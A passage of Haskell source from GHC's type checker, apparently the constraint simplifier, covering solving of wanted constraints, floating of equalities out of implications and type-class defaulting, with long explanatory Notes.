             -> WantedConstraints       -- Constraints from LHS
             -> WantedConstraints       -- Constraints from RHS
             -> TcM ([EvVar], WantedConstraints)   -- LHS evidence variables
-- See Note [Simplifying RULE constraints] in TcRule
simplifyRule name lhs_wanted rhs_wanted
  = do {         -- We allow ourselves to unify environment
                 -- variables: runTcS runs with topTcLevel
         (resid_wanted, _) <- solveWantedsTcM (lhs_wanted `andWC` rhs_wanted)
                              -- Post: these are zonked and unflattened

       ; zonked_lhs_simples <- TcM.zonkSimples (wc_simple lhs_wanted)
       ; let (q_cts, non_q_cts) = partitionBag quantify_me zonked_lhs_simples
             quantify_me  -- Note [RULE quantification over equalities]
               | insolubleWC resid_wanted = quantify_insol
               | otherwise = quantify_normal

             -- If solving found type errors, refrain from quantifying
             -- over any equality at all.
             quantify_insol ct = not (isEqPred (ctPred ct))

             -- Otherwise quantify over everything except trivially
             -- reflexive nominal equalities.
             quantify_normal ct
               | EqPred NomEq t1 t2 <- classifyPredType (ctPred ct)
               = not (t1 `tcEqType` t2)
               | otherwise
               = True

       ; traceTc "simplifyRule" $
         vcat [ ptext (sLit "LHS of rule") <+> doubleQuotes (ftext name)
              , text "zonked_lhs_simples" <+> ppr zonked_lhs_simples
              , text "q_cts" <+> ppr q_cts
              , text "non_q_cts" <+> ppr non_q_cts ]

       ; return ( map (ctEvId . ctEvidence) (bagToList q_cts)
                , lhs_wanted { wc_simple = non_q_cts }) }
{-
*********************************************************************************
* *
* Main Simplifier *
* *
***********************************************************************************
Note [Deferring coercion errors to runtime]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
While developing, sometimes it is desirable to allow compilation to succeed even
if there are type errors in the code. Consider the following case:
module Main where
a :: Int
a = 'a'
main = print "b"
Even though `a` is ill-typed, it is not used in the end, so if all that we're
interested in is `main` it is handy to be able to ignore the problems in `a`.
Since we treat type equalities as evidence, this is relatively simple. Whenever
we run into a type mismatch in TcUnify, we normally just emit an error. But it
is always safe to defer the mismatch to the main constraint solver. If we do
that, `a` will get transformed into
co :: Int ~ Char
co = ...
a :: Int
a = 'a' `cast` co
The constraint solver would realize that `co` is an insoluble constraint, and
emit an error with `reportUnsolved`. But we can also replace the right-hand side
of `co` with `error "Deferred type error: Int ~ Char"`. This allows the program
to compile, and it will run fine unless we evaluate `a`. This is what
`deferErrorsToRuntime` does.
It does this by keeping track of which errors correspond to which coercion
in TcErrors (with ErrEnv). TcErrors.reportTidyWanteds does not print the errors
and does not fail if -fdefer-type-errors is on, so that we can continue
compilation. The errors are turned into warnings in `reportUnsolved`.
Note [Zonk after solving]
~~~~~~~~~~~~~~~~~~~~~~~~~
We zonk the result immediately after constraint solving, for two reasons:
a) because zonkWC generates evidence, and this is the moment when we
have a suitable evidence variable to hand.
Note that *after* solving the constraints are typically small, so the
overhead is not great.
-}
-- | Run a solver action over the given constraints, writing evidence
-- into the supplied 'EvBindsVar', and zonk the result.
solveWantedsTcMWithEvBinds :: EvBindsVar
                           -> WantedConstraints
                           -> (WantedConstraints -> TcS WantedConstraints)
                           -> TcM WantedConstraints
-- Returns a *zonked* result
-- We zonk when we finish primarily to un-flatten out any
-- flatten-skolems etc introduced by canonicalisation of
-- types involving type functions. Happily the result
-- is typically much smaller than the input, indeed it is
-- often empty.
solveWantedsTcMWithEvBinds ev_binds_var wc tcs_action
  = do { traceTc "solveWantedsTcMWithEvBinds" $ text "wanted=" <+> ppr wc
       ; wc2 <- runTcSWithEvBinds ev_binds_var (tcs_action wc)
       ; zonkWC wc2 }
         -- See Note [Zonk after solving]
-- | Solve the given wanted constraints in a fresh evidence-bindings
-- variable, returning the residual constraints and the evidence binds.
solveWantedsTcM :: WantedConstraints -> TcM (WantedConstraints, Bag EvBind)
-- Zonk the input constraints, and simplify them
-- Return the evidence binds in the BagEvBinds result
-- Discards all Derived stuff in result
-- Postcondition: fully zonked and unflattened constraints
solveWantedsTcM wanted
  = do { ev_binds_var <- TcM.newTcEvBinds
       ; wanteds' <- solveWantedsTcMWithEvBinds ev_binds_var wanted solveWantedsAndDrop
       ; binds <- TcRnMonad.getTcEvBinds ev_binds_var
       ; return (wanteds', binds) }
-- | Solve a list of Wanted constraints and return the (zonked)
-- residual constraints, throwing away the evidence bindings.
simplifyWantedsTcM :: [Ct] -> TcM WantedConstraints
-- Solve the specified Wanted constraints
-- Discard the evidence binds
-- Discards all Derived stuff in result
-- Postcondition: fully zonked and unflattened constraints
simplifyWantedsTcM wanted
  = do { traceTc "simplifyWantedsTcM {" (ppr wanted)
       ; (result, _) <- runTcS (solveWantedsAndDrop (mkSimpleWC wanted))
       ; result <- TcM.zonkWC result
       ; traceTc "simplifyWantedsTcM }" (ppr result)
       ; return result }
-- | Like 'solveWanteds', but drop Derived constraints from the result.
solveWantedsAndDrop :: WantedConstraints -> TcS (WantedConstraints)
-- Since solveWanteds returns the residual WantedConstraints,
-- it should always be called within a runTcS or something similar,
solveWantedsAndDrop wanted = do { wc <- solveWanteds wanted
                                ; return (dropDerivedWC wc) }
-- | Main entry point of the simplifier for wanted constraints: solve
-- the simple constraints, then iterate via 'simpl_loop' while
-- equalities can be floated out of nested implications.
solveWanteds :: WantedConstraints -> TcS WantedConstraints
-- so that the inert set doesn't mindlessly propagate.
-- NB: wc_simples may be wanted /or/ derived now
solveWanteds wanteds
  = do { traceTcS "solveWanteds {" (ppr wanteds)
         -- Try the simple bit, including insolubles. Solving insolubles a
         -- second time round is a bit of a waste; but the code is simple
         -- and the program is wrong anyway, and we don't run the danger
         -- of adding Derived insolubles twice; see
         -- TcSMonad Note [Do not add duplicate derived insolubles]
       ; traceTcS "solveSimples {" empty
       ; solved_simples_wanteds <- solveSimples wanteds
       ; traceTcS "solveSimples end }" (ppr solved_simples_wanteds)
       -- solveWanteds iterates when it is able to float
       -- equalities out of one or more of the implications.
       ; final_wanteds <- simpl_loop 1 solved_simples_wanteds
       ; bb <- getTcEvBindsMap
       ; traceTcS "solveWanteds }" $
                 vcat [ text "final wc =" <+> ppr final_wanteds
                      , text "current evbinds  =" <+> ppr (evBindMapBinds bb) ]
       ; return final_wanteds }
-- | Solve the simple (and non-Derived insoluble) constraints of a
-- 'WantedConstraints', inside a nested TcS scope so the ambient
-- inert set is not affected.
solveSimples :: WantedConstraints -> TcS WantedConstraints
-- Solve the wc_simple and wc_insol components of the WantedConstraints
-- Do not affect the inerts
solveSimples (WC { wc_simple = simples, wc_insol = insols, wc_impl = implics })
  = nestTcS $
    do { let all_simples = simples `unionBags` filterBag (not . isDerivedCt) insols
                  -- See Note [Dropping derived constraints] in TcRnTypes for
                  -- why the insolubles may have derived constraints
       ; wc <- solveSimpleWanteds all_simples
       ; return ( wc { wc_impl = implics `unionBags` wc_impl wc } ) }
-- | Iterate the solver: solve nested implications, float out any
-- equalities, and re-solve with the floated equalities added.
-- Bounded at 10 iterations to guarantee termination.
-- See Note [Cutting off simpl_loop].
simpl_loop :: Int
           -> WantedConstraints
           -> TcS WantedConstraints
simpl_loop n wanteds@(WC { wc_simple = simples, wc_insol = insols, wc_impl = implics })
  | n > 10
  = do { traceTcS "solveWanteds: loop!" empty
       ; return wanteds }
  | otherwise
  = do { traceTcS "simpl_loop, iteration" (int n)
       ; (floated_eqs, unsolved_implics) <- solveNestedImplications implics
       ; if isEmptyBag floated_eqs
         then return (wanteds { wc_impl = unsolved_implics })
         else
    do {   -- Put floated_eqs into the current inert set before looping
         (unifs_happened, solve_simple_res)
             <- reportUnifications $
                solveSimples (WC { wc_simple = floated_eqs `unionBags` simples
                                   -- Put floated_eqs first so they get solved first
                                 , wc_insol = emptyBag, wc_impl = emptyBag })
       ; let new_wanteds = solve_simple_res `andWC`
                           WC { wc_simple = emptyBag
                              , wc_insol  = insols
                              , wc_impl   = unsolved_implics }
         -- Only iterate if something that could create new givens
         -- actually happened; see Note [Cutting off simpl_loop]
       ; if   not unifs_happened   -- See Note [Cutting off simpl_loop]
           && isEmptyBag (wc_impl solve_simple_res)
         then return new_wanteds
         else simpl_loop (n+1) new_wanteds } }
-- | Solve each implication in the bag, collecting all equalities
-- floated out of them and the implications that remain unsolved.
solveNestedImplications :: Bag Implication
                        -> TcS (Cts, Bag Implication)
-- Precondition: the TcS inerts may contain unsolved simples which have
-- to be converted to givens before we go inside a nested implication.
solveNestedImplications implics
  | isEmptyBag implics
  = return (emptyBag, emptyBag)
  | otherwise
  = do {
           -- inerts <- getTcSInerts
           -- ; let thinner_inerts = prepareInertsForImplications inerts
           --        -- See Note [Preparing inert set for implications]
           --
           traceTcS "solveNestedImplications starting {" empty
           --  vcat [ text "original inerts = " <+> ppr inerts
           --       , text "thinner_inerts  = " <+> ppr thinner_inerts ]
       ; (floated_eqs, unsolved_implics)
           <- flatMapBagPairM solveImplication implics
       -- ... and we are back in the original TcS inerts
       -- Notice that the original includes the _insoluble_simples so it was safe to ignore
       -- them in the beginning of this function.
       ; traceTcS "solveNestedImplications end }" $
                  vcat [ text "all floated_eqs ="  <+> ppr floated_eqs
                       , text "unsolved_implics =" <+> ppr unsolved_implics ]
       ; return (floated_eqs, unsolved_implics) }
-- | Solve a single implication constraint: bring its givens into
-- scope at the inner level, solve the wanteds, then float out any
-- equalities that may be soluble outside the implication.
solveImplication :: Implication    -- Wanted
                 -> TcS (Cts,      -- All wanted or derived floated equalities: var = type
                         Bag Implication) -- Unsolved rest (always empty or singleton)
-- Precondition: The TcS monad contains an empty worklist and given-only inerts
-- which after trying to solve this implication we must restore to their original value
solveImplication imp@(Implic { ic_tclvl  = tclvl
                             , ic_binds  = ev_binds
                             , ic_skols  = skols
                             , ic_given  = givens
                             , ic_wanted = wanteds
                             , ic_info   = info
                             , ic_env    = env })
  = do { inerts <- getTcSInerts
       ; traceTcS "solveImplication {" (ppr imp $$ text "Inerts" <+> ppr inerts)
         -- Solve the nested constraints
       ; (no_given_eqs, residual_wanted)
            <- nestImplicTcS ev_binds tclvl $
               do { solveSimpleGivens (mkGivenLoc tclvl info env) givens
                  ; residual_wanted <- solveWanteds wanteds
                        -- solveWanteds, *not* solveWantedsAndDrop, because
                        -- we want to retain derived equalities so we can float
                        -- them out in floatEqualities
                  ; no_eqs <- getNoGivenEqs tclvl skols
                  ; return (no_eqs, residual_wanted) }
       ; (floated_eqs, final_wanted)
             <- floatEqualities skols no_given_eqs residual_wanted
       ; let res_implic | isEmptyWC final_wanted --  && no_given_eqs
                        = emptyBag  -- Reason for the no_given_eqs: we don't want to
                                    -- lose the "inaccessible code" error message
                                    -- BUT: final_wanted still has the derived insolubles
                                    --      so it should be fine
                        | otherwise
                        = unitBag (imp { ic_no_eqs = no_given_eqs
                                       , ic_wanted = dropDerivedWC final_wanted
                                       , ic_insol  = insolubleWC final_wanted })
       ; evbinds <- getTcEvBindsMap
       ; traceTcS "solveImplication end }" $ vcat
             [ text "no_given_eqs =" <+> ppr no_given_eqs
             , text "floated_eqs =" <+> ppr floated_eqs
             , text "res_implic =" <+> ppr res_implic
             , text "implication evbinds = " <+> ppr (evBindMapBinds evbinds) ]
       ; return (floated_eqs, res_implic) }
{-
Note [Cutting off simpl_loop]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It is very important not to iterate in simpl_loop unless there is a chance
of progress. Trac #8474 is a classic example:
* There's a deeply-nested chain of implication constraints.
?x:alpha => ?y1:beta1 => ... ?yn:betan => [W] ?x:Int
* From the innermost one we get a [D] alpha ~ Int,
but alpha is untouchable until we get out to the outermost one
* We float [D] alpha~Int out (it is in floated_eqs), but since alpha
is untouchable, the solveInteract in simpl_loop makes no progress
* So there is no point in attempting to re-solve
?yn:betan => [W] ?x:Int
because we'll just get the same [D] again
 * If we *do* re-solve, we'll get an infinite loop.  It is cut off by
the fixed bound of 10, but solving the next takes 10*10*...*10 (ie
exponentially many) iterations!
Conclusion: we should iterate simpl_loop iff we will get more 'givens'
in the inert set when solving the nested implications. That is the
result of prepareInertsForImplications is larger. How can we tell
this?
Consider floated_eqs (all wanted or derived):
(a) [W/D] CTyEqCan (a ~ ty). This can give rise to a new given only by causing
a unification. So we count those unifications.
(b) [W] CFunEqCan (F tys ~ xi). Even though these are wanted, they
are pushed in as givens by prepareInertsForImplications. See Note
[Preparing inert set for implications] in TcSMonad. But because
of that very fact, we won't generate another copy if we iterate
simpl_loop. So we iterate if there any of these
-}
------------------
-- | Check whether a set of given constraints is satisfiable.
--
-- We solve the givens and inspect the inert set: @res@ below is True
-- iff some insoluble constraint was found, so the final answer is
-- @not res@ (satisfiable means no insolubles).
tcCheckSatisfiability :: Bag EvVar -> TcM Bool
-- Return True if satisfiable, False if definitely contradictory
tcCheckSatisfiability givens
  = do { lcl_env <- TcM.getLclEnv
       ; let given_loc = mkGivenLoc topTcLevel UnkSkol lcl_env
         -- Fixed typo in the trace tags ("checkSatisfiabilty"), so that
         -- the open/close markers grep consistently in -ddump output
       ; traceTc "checkSatisfiability {" (ppr givens)
       ; (res, _ev_binds) <- runTcS $
             do { solveSimpleGivens given_loc (bagToList givens)
                ; insols <- getInertInsols
                ; return (not (isEmptyBag insols)) }
       ; traceTc "checkSatisfiability }" (ppr res)
       ; return (not res) }
-- | Promote a floated-out touchable meta type variable to the given
-- (outer) level, by cloning it at that level and binding the original
-- variable to the clone.  No-op for any other kind of variable.
promoteTyVar :: TcLevel -> TcTyVar -> TcS ()
-- When we float a constraint out of an implication we must restore
-- invariant (MetaTvInv) in Note [TcLevel and untouchable type variables] in TcType
-- See Note [Promoting unification variables]
promoteTyVar tclvl tv
  | isFloatedTouchableMetaTyVar tclvl tv
  = do { cloned_tv <- TcS.cloneMetaTyVar tv
       ; let rhs_tv = setMetaTyVarTcLevel cloned_tv tclvl
       ; setWantedTyBind tv (mkTyVarTy rhs_tv) }
  | otherwise
  = return ()
-- | Promote a type variable to the given level, first defaulting its
-- kind unless the variable is mentioned in the global tyvar set.
promoteAndDefaultTyVar :: TcLevel -> TcTyVarSet -> TyVar -> TcS ()
-- See Note [Promote _and_ default when inferring]
promoteAndDefaultTyVar tclvl gbl_tvs tv
  = do { tv1 <- if tv `elemVarSet` gbl_tvs
                then return tv
                else defaultTyVar tv
       ; promoteTyVar tclvl tv1 }
-- | If the variable's kind has a default (e.g. OpenKind defaults to *),
-- rewrite the variable itself to a fresh clone with the defaulted kind
-- and return the clone; otherwise return the variable unchanged.
defaultTyVar :: TcTyVar -> TcS TcTyVar
-- Precondition: MetaTyVars only
-- See Note [DefaultTyVar]
defaultTyVar the_tv
  | Just default_k <- defaultKind_maybe (tyVarKind the_tv)
  = do { tv' <- TcS.cloneMetaTyVar the_tv
       ; let new_tv = setTyVarKind tv' default_k
       ; traceTcS "defaultTyVar" (ppr the_tv <+> ppr new_tv)
       ; setWantedTyBind the_tv (mkTyVarTy new_tv)
       ; return new_tv }
             -- Why not directly derived_pred = mkTcEqPred k default_k?
             -- See Note [DefaultTyVar]
             -- We keep the same TcLevel on tv'
  | otherwise = return the_tv    -- The common case
-- | Extract from a constraint the simple constraints we might
-- plausibly quantify over (or default), floating them out of
-- implications only when no skolem-trapped variables are involved.
approximateWC :: WantedConstraints -> Cts
-- Postcondition: Wanted or Derived Cts
-- See Note [ApproximateWC]
approximateWC wc
  = float_wc emptyVarSet wc
  where
    float_wc :: TcTyVarSet -> WantedConstraints -> Cts
    float_wc trapping_tvs (WC { wc_simple = simples, wc_impl = implics })
      = filterBag is_floatable simples `unionBags`
        do_bag (float_implic new_trapping_tvs) implics
      where
        -- Close the trapped set under variable-sharing with the simples;
        -- see caveat (2) of Note [ApproximateWC]
        new_trapping_tvs = fixVarSet grow trapping_tvs
        is_floatable ct = tyVarsOfCt ct `disjointVarSet` new_trapping_tvs
        grow tvs = foldrBag grow_one tvs simples
        grow_one ct tvs | ct_tvs `intersectsVarSet` tvs = tvs `unionVarSet` ct_tvs
                        | otherwise                     = tvs
                        where
                          ct_tvs = tyVarsOfCt ct
    float_implic :: TcTyVarSet -> Implication -> Cts
    float_implic trapping_tvs imp
      | ic_no_eqs imp                 -- No equalities, so float
      = float_wc new_trapping_tvs (ic_wanted imp)
      | otherwise                     -- Don't float out of equalities
      = emptyCts                      -- See Note [ApproximateWC]
      where
        new_trapping_tvs = trapping_tvs `extendVarSetList` ic_skols imp
    do_bag :: (a -> Bag c) -> Bag a -> Bag c
    do_bag f = foldrBag (unionBags.f) emptyBag
{-
Note [ApproximateWC]
~~~~~~~~~~~~~~~~~~~~
approximateWC takes a constraint, typically arising from the RHS of a
let-binding whose type we are *inferring*, and extracts from it some
*simple* constraints that we might plausibly abstract over. Of course
the top-level simple constraints are plausible, but we also float constraints
out from inside, if they are not captured by skolems.
The same function is used when doing type-class defaulting (see the call
to applyDefaultingRules) to extract constraints that might be defaulted.
There are two caveats:
1. We do *not* float anything out if the implication binds equality
constraints, because that defeats the OutsideIn story. Consider
data T a where
TInt :: T Int
MkT :: T a
f TInt = 3::Int
We get the implication (a ~ Int => res ~ Int), where so far we've decided
f :: T a -> res
We don't want to float (res~Int) out because then we'll infer
f :: T a -> Int
which is only one of the possible types. (GHC 7.6 accidentally *did*
float out of such implications, which meant it would happily infer
non-principal types.)
2. We do not float out an inner constraint that shares a type variable
(transitively) with one that is trapped by a skolem. Eg
forall a. F a ~ beta, Integral beta
We don't want to float out (Integral beta). Doing so would be bad
when defaulting, because then we'll default beta:=Integer, and that
makes the error message much worse; we'd get
Can't solve F a ~ Integer
rather than
Can't solve Integral (F a)
Moreover, floating out these "contaminated" constraints doesn't help
when generalising either. If we generalise over (Integral b), we still
can't solve the retained implication (forall a. F a ~ b). Indeed,
arguably that too would be a harder error to understand.
Note [DefaultTyVar]
~~~~~~~~~~~~~~~~~~~
defaultTyVar is used on any un-instantiated meta type variables to
default the kind of OpenKind and ArgKind etc to *. This is important
to ensure that instance declarations match. For example consider
instance Show (a->b)
foo x = show (\_ -> True)
Then we'll get a constraint (Show (p ->q)) where p has kind ArgKind,
and that won't match the typeKind (*) in the instance decl. See tests
tc217 and tc175.
We look only at touchable type variables. No further constraints
are going to affect these type variables, so it's time to do it by
hand. However we aren't ready to default them fully to () or
whatever, because the type-class defaulting rules have yet to run.
An important point is that if the type variable tv has kind k and the
default is default_k we do not simply generate [D] (k ~ default_k) because:
(1) k may be ArgKind and default_k may be * so we will fail
(2) We need to rewrite all occurrences of the tv to be a type
variable with the right kind and we choose to do this by rewriting
the type variable /itself/ by a new variable which does have the
right kind.
Note [Promote _and_ default when inferring]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When we are inferring a type, we simplify the constraint, and then use
approximateWC to produce a list of candidate constraints. Then we MUST
a) Promote any meta-tyvars that have been floated out by
approximateWC, to restore invariant (MetaTvInv) described in
Note [TcLevel and untouchable type variables] in TcType.
 b) Default the kind of any meta-tyvars that are not mentioned in
in the environment.
To see (b), suppose the constraint is (C ((a :: OpenKind) -> Int)), and we
have an instance (C ((x:*) -> Int)). The instance doesn't match -- but it
should! If we don't solve the constraint, we'll stupidly quantify over
(C (a->Int)) and, worse, in doing so zonkQuantifiedTyVar will quantify over
(b:*) instead of (a:OpenKind), which can lead to disaster; see Trac #7332.
Trac #7641 is a simpler example.
Note [Promoting unification variables]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When we float an equality out of an implication we must "promote" free
unification variables of the equality, in order to maintain Invariant
(MetaTvInv) from Note [TcLevel and untouchable type variables] in TcType. for the
leftover implication.
This is absolutely necessary. Consider the following example. We start
with two implications and a class with a functional dependency.
class C x y | x -> y
instance C [a] [a]
(I1) [untch=beta]forall b. 0 => F Int ~ [beta]
(I2) [untch=beta]forall c. 0 => F Int ~ [[alpha]] /\ C beta [c]
We float (F Int ~ [beta]) out of I1, and we float (F Int ~ [[alpha]]) out of I2.
They may react to yield that (beta := [alpha]) which can then be pushed inwards
the leftover of I2 to get (C [alpha] [a]) which, using the FunDep, will mean that
(alpha := a). In the end we will have the skolem 'b' escaping in the untouchable
beta! Concrete example is in indexed_types/should_fail/ExtraTcsUntch.hs:
class C x y | x -> y where
op :: x -> y -> ()
instance C [a] [a]
type family F a :: *
h :: F Int -> ()
h = undefined
data TEx where
TEx :: a -> TEx
f (x::beta) =
let g1 :: forall b. b -> ()
g1 _ = h [x]
g2 z = case z of TEx y -> (h [[undefined]], op x [y])
in (g1 '3', g2 undefined)
Note [Solving Family Equations]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
After we are done with simplification we may be left with constraints of the form:
[Wanted] F xis ~ beta
If 'beta' is a touchable unification variable not already bound in the TyBinds
then we'd like to create a binding for it, effectively "defaulting" it to be 'F xis'.
When is it ok to do so?
1) 'beta' must not already be defaulted to something. Example:
[Wanted] F Int ~ beta <~ Will default [beta := F Int]
[Wanted] F Char ~ beta <~ Already defaulted, can't default again. We
have to report this as unsolved.
2) However, we must still do an occurs check when defaulting (F xis ~ beta), to
set [beta := F xis] only if beta is not among the free variables of xis.
3) Notice that 'beta' can't be bound in ty binds already because we rewrite RHS
of type family equations. See Inert Set invariants in TcInteract.
This solving is now happening during zonking, see Note [Unflattening while zonking]
in TcMType.
*********************************************************************************
* *
* Floating equalities *
* *
*********************************************************************************
Note [Float Equalities out of Implications]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For ordinary pattern matches (including existentials) we float
equalities out of implications, for instance:
data T where
MkT :: Eq a => a -> T
f x y = case x of MkT _ -> (y::Int)
We get the implication constraint (x::T) (y::alpha):
forall a. [untouchable=alpha] Eq a => alpha ~ Int
We want to float out the equality into a scope where alpha is no
longer untouchable, to solve the implication!
But we cannot float equalities out of implications whose givens may
yield or contain equalities:
data T a where
T1 :: T Int
T2 :: T Bool
T3 :: T a
h :: T a -> a -> Int
f x y = case x of
T1 -> y::Int
T2 -> y::Bool
T3 -> h x y
We generate constraint, for (x::T alpha) and (y :: beta):
[untouchables = beta] (alpha ~ Int => beta ~ Int) -- From 1st branch
[untouchables = beta] (alpha ~ Bool => beta ~ Bool) -- From 2nd branch
(alpha ~ beta) -- From 3rd branch
If we float the equality (beta ~ Int) outside of the first implication and
the equality (beta ~ Bool) out of the second we get an insoluble constraint.
But if we just leave them inside the implications we unify alpha := beta and
solve everything.
Principle:
We do not want to float equalities out which may
need the given *evidence* to become soluble.
Consequence: classes with functional dependencies don't matter (since there is
no evidence for a fundep equality), but equality superclasses do matter (since
they carry evidence).
-}
floatEqualities :: [TcTyVar] -> Bool
                -> WantedConstraints
                -> TcS (Cts, WantedConstraints)
-- Main idea: see Note [Float Equalities out of Implications]
--
-- Precondition: the wc_simple of the incoming WantedConstraints are
--               fully zonked, so that we can see their free variables
--
-- Postcondition: The returned floated constraints (Cts) are only
--                Wanted or Derived and come from the input wanted
--                ev vars or deriveds
--
-- Also performs some unifications (via promoteTyVar), adding to
-- monadically-carried ty_binds. These will be used when processing
-- floated_eqs later
--
-- Subtleties: Note [Float equalities from under a skolem binding]
--             Note [Skolem escape]
floatEqualities skols no_given_eqs wanteds@(WC { wc_simple = simples })
  | not no_given_eqs  -- There are some given equalities, so don't float
  = return (emptyBag, wanteds)   -- Note [Float Equalities out of Implications]
  | otherwise
  = do { outer_tclvl <- TcS.getTcLevel
       ; mapM_ (promoteTyVar outer_tclvl) (varSetElems (tyVarsOfCts float_eqs))
             -- See Note [Promoting unification variables]
       ; traceTcS "floatEqualities" (vcat [ text "Skols =" <+> ppr skols
                                          , text "Simples =" <+> ppr simples
                                          , text "Floated eqs =" <+> ppr float_eqs ])
       ; return (float_eqs, wanteds { wc_simple = remaining_simples }) }
  where
    skol_set = mkVarSet skols
    (float_eqs, remaining_simples) = partitionBag float_me simples
    -- A constraint floats iff it is a nominal equality, mentions no
    -- skolem, and stands a chance of being solved outside
    float_me :: Ct -> Bool
    float_me ct   -- The constraint is un-flattened and de-canonicalised
      | let pred = ctPred ct
      , EqPred NomEq ty1 ty2 <- classifyPredType pred
      , tyVarsOfType pred `disjointVarSet` skol_set
      , useful_to_float ty1 ty2
      = True
      | otherwise
      = False
      -- Float out alpha ~ ty, or ty ~ alpha
      -- which might be unified outside
      -- See Note [Do not float kind-incompatible equalities]
    useful_to_float ty1 ty2
      = case (tcGetTyVar_maybe ty1, tcGetTyVar_maybe ty2) of
          (Just tv1, _) | isMetaTyVar tv1
                        , k2 `isSubKind` k1
                        -> True
          (_, Just tv2) | isMetaTyVar tv2
                        , k1 `isSubKind` k2
                        -> True
          _ -> False
      where
        k1 = typeKind ty1
        k2 = typeKind ty2
{-
Note [Do not float kind-incompatible equalities]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If we have (t::* ~ s::*->*), we'll get a Derived insoluble equality.
If we float the equality outwards, we'll get *another* Derived
insoluble equality one level out, so the same error will be reported
twice. So we refrain from floating such equalities
Note [Float equalities from under a skolem binding]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Which of the simple equalities can we float out? Obviously, only
ones that don't mention the skolem-bound variables. But that is
over-eager. Consider
[2] forall a. F a beta[1] ~ gamma[2], G beta[1] gamma[2] ~ Int
The second constraint doesn't mention 'a'. But if we float it
we'll promote gamma[2] to gamma'[1]. Now suppose that we learn that
beta := Bool, and F a Bool = a, and G Bool _ = Int. Then we'll
we left with the constraint
[2] forall a. a ~ gamma'[1]
which is insoluble because gamma became untouchable.
Solution: float only constraints that stand a jolly good chance of
being soluble simply by being floated, namely ones of form
a ~ ty
where 'a' is a currently-untouchable unification variable, but may
become touchable by being floated (perhaps by more than one level).
We had a very complicated rule previously, but this is nice and
simple. (To see the notes, look at this Note in a version of
TcSimplify prior to Oct 2014).
Note [Skolem escape]
~~~~~~~~~~~~~~~~~~~~
You might worry about skolem escape with all this floating.
For example, consider
[2] forall a. (a ~ F beta[2] delta,
Maybe beta[2] ~ gamma[1])
The (Maybe beta ~ gamma) doesn't mention 'a', so we float it, and
solve with gamma := beta. But what if later delta:=Int, and
F b Int = b.
Then we'd get a ~ beta[2], and solve to get beta:=a, and now the
skolem has escaped!
But it's ok: when we float (Maybe beta[2] ~ gamma[1]), we promote beta[2]
to beta[1], and that means the (a ~ beta[1]) will be stuck, as it should be.
*********************************************************************************
* *
*                 Defaulting and disambiguation                                 *
* *
*********************************************************************************
-}
-- | Apply the type-class defaulting rules to the given unsolved
-- constraints, attempting to disambiguate each defaultable group.
applyDefaultingRules :: Cts -> TcS Bool
-- True <=> I did some defaulting, reflected in ty_binds
-- Return some extra derived equalities, which express the
-- type-class default choice.
applyDefaultingRules wanteds
  | isEmptyBag wanteds
  = return False
  | otherwise
  = do { traceTcS "applyDefaultingRules { " $
                  text "wanteds =" <+> ppr wanteds
       ; info@(default_tys, _) <- getDefaultInfo
       ; let groups = findDefaultableGroups info wanteds
       ; traceTcS "findDefaultableGroups" $ vcat [ text "groups=" <+> ppr groups
                                                 , text "info=" <+> ppr info ]
       ; something_happeneds <- mapM (disambigGroup default_tys) groups
       ; traceTcS "applyDefaultingRules }" (ppr something_happeneds)
       ; return (or something_happeneds) }
-- | Partition the unsolved constraints into groups of unary class
-- constraints (C tv) sharing the same type variable, keeping only
-- the groups that the defaulting rules are allowed to act on.
findDefaultableGroups
    :: ( [Type]
       , (Bool,Bool) )  -- (Overloaded strings, extended default rules)
    -> Cts              -- Unsolved (wanted or derived)
    -> [[(Ct,Class,TcTyVar)]]
findDefaultableGroups (default_tys, (ovl_strings, extended_defaults)) wanteds
  | null default_tys = []
  | otherwise        = defaultable_groups
  where
    defaultable_groups = filter is_defaultable_group groups
    groups             = equivClasses cmp_tv unaries
    unaries     :: [(Ct, Class, TcTyVar)]  -- (C tv) constraints
    non_unaries :: [Ct]                    -- and *other* constraints
    (unaries, non_unaries) = partitionWith find_unary (bagToList wanteds)
        -- Finds unary type-class constraints
        -- But take account of polykinded classes like Typeable,
        -- which may look like (Typeable * (a:*))   (Trac #8931)
    find_unary cc
        | Just (cls,tys)   <- getClassPredTys_maybe (ctPred cc)
        , Just (kinds, ty) <- snocView tys
        , all isKind kinds
        , Just tv <- tcGetTyVar_maybe ty
        , isMetaTyVar tv  -- We might have runtime-skolems in GHCi, and
                          -- we definitely don't want to try to assign to those!
        = Left (cc, cls, tv)
    find_unary cc = Right cc  -- Non unary or non dictionary
    bad_tvs :: TcTyVarSet  -- TyVars mentioned by non-unaries
    bad_tvs = mapUnionVarSet tyVarsOfCt non_unaries
    cmp_tv (_,_,tv1) (_,_,tv2) = tv1 `compare` tv2
    -- A group is defaultable iff its tyvar is TyConable, does not
    -- occur in any non-unary constraint, and its classes qualify
    is_defaultable_group ds@((_,_,tv):_)
        = let b1 = isTyConableTyVar tv  -- Note [Avoiding spurious errors]
              b2 = not (tv `elemVarSet` bad_tvs)
              b4 = defaultable_classes [cls | (_,cls,_) <- ds]
          in (b1 && b2 && b4)
    is_defaultable_group [] = panic "defaultable_group"
    defaultable_classes clss
        | extended_defaults = any isInteractiveClass clss
        | otherwise         = all is_std_class clss && (any is_num_class clss)
    -- In interactive mode, or with -XExtendedDefaultRules,
    -- we default Show a to Show () to avoid gratuitous errors on "show []"
    isInteractiveClass cls
        = is_num_class cls || (classKey cls `elem` [showClassKey, eqClassKey, ordClassKey])
    is_num_class cls = isNumericClass cls || (ovl_strings && (cls `hasKey` isStringClassKey))
    -- is_num_class adds IsString to the standard numeric classes,
    -- when -foverloaded-strings is enabled
    is_std_class cls = isStandardClass cls || (ovl_strings && (cls `hasKey` isStringClassKey))
    -- Similarly is_std_class
------------------------------
-- | Try each candidate default type in turn: tentatively equate the
-- group's type variable to the candidate inside a fake implication,
-- and commit to the first candidate that solves all the constraints.
disambigGroup :: [Type]                  -- The default types
